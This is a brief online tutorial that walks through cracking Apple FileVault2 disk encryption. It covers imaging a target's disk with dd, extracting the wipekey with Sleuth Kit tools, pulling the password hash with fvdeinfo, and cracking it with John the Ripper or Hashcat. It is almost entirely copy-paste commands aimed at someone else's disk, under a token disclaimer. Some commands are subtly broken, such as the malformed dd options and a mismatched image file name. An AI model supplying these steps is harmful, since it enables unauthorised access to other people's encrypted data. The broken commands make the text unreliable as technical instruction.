How to Crack Apple’s FileVault2 Encryption
Here’s The Tut To Crack Apple’s FileVault2 Encryption
Purely For Educational Purpose Only, We Don’t Encourage Any Illegal Activities.
STEP 1: Use dd to extract image of your targets FileVault2 encrypted disk:
sudo dd if=/dev/disk2 of=/path/to/filevault_image.dd
conv = noerr, sync
STEP 2: Install fvde2john from https://github.com/kholia/fvde2john
STEP 3: Use hdiutil to attach to dd image:
hdiutil attach -imagekey diskimage-class=CRawDiskImage -nomount /Volumes/path/to/filevault_image.dd
STEP 4: Obtain the EncryptedRoot.plist.wipekey from “Recovery HD” partition
https://github.com/libyal/libfvde/wiki/Mounting#obtaining-encryptedrootplistwipekey
mmls /Volumes/path/to/filevault_image.dd
fls -r -o 50450752 /Volumes/path/to/filevault_image.dd | grep -i EncryptedRoot
icat -o 50450752 image.raw 130 > EncryptedRoot.plist.wipekey
STEP 5: Verify and note the disk mount point for Apple_Corestorage:
diskutil list
…/dev/disk3s2 Apple_Corestorage
STEP 6: Use EncryptedRoot.plist.wipekey with fvdeinfo to retrieve the hash:
sudo fvdetools/fvdeinfo -e EncryptedRoot.plist.wipekey -p blablah /dev/disk3s2
Will return hash
FINAL STEP : Load this hash into JTR or Hashcat to crack it:
john --format=FVDE-opencl --wordlist=dict.txt hash.txt
hashcat -a 0 -m 16700 hash.txt dict.txt